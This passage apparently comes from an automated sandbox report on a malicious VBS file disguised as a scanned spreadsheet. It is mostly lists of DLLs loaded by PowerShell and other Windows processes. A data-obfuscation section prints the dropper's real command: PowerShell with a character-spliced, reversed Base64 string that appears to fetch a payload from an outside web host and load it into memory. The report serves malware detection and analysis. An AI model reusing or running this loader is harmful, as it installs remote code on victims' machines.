                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: comsvcs.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdatauser.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                    Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell") : uwqxh.Run( "powershell -command ""$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Ec' + [char]65 + 'Lg' + [char]65
Source: 4.2.powershell.exe.1bdb03863b0.1.raw.unpack, -.cs | .Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 4.2.powershell.exe.1bdc82e0000.2.raw.unpack, -.cs | .Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 4.2.powershell.exe.1bdb17aa240.0.raw.unpack, -.cs | .Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 13.2.powershell.exe.1eb4d619c80.0.raw.unpack, -.cs | .Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 13.2.powershell.exe.1eb4dee3608.1.raw.unpack, -.cs | .Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 18.2.powershell.exe.199616b0000.0.raw.unpack, -.cs | .Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 18.2.powershell.exe.199619d7e98.2.raw.unpack, -.cs | .Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 18.2.powershell.exe.199622abc98.1.raw.unpack, -.cs | .Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 23.2.powershell.exe.23e03d17d98.0.raw.unpack, -.cs | .Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: 23.2.powershell.exe.23e045e64b0.1.raw.unpack, -.cs | .Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String( $nvcbv ) ); $acwwn = $acwwn[-1..-$acwwn.Length] -join '';$acwwn = $acwwn.replace('%XRqhI%','C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs');powershell $acwwn$glo
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 